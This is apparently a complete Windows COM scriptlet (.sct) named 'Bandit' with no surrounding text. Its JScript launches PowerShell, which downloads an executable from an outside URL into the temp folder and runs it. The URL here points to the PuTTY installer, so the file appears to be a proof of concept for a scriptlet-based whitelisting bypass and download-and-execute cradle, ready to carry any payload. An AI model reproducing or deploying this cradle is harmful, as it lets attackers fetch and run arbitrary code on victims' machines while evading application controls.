<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
    remotable="true"
	>
</registration>

<script language="JScript">
<![CDATA[
urlLink = "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe";




	var r = new ActiveXObject("WScript.Shell").Run("powershell   -noexit -command  cd $env:TEMP; $url = '"+urlLink+"' ;$file1 = $env:TEMP + '\\a999.exe';$WebClient = New-Object System.Net.WebClient;$WebClient.DownloadFile($url,$file1);  & $file1 ");
	
	
]]>
</script>

</scriptlet>
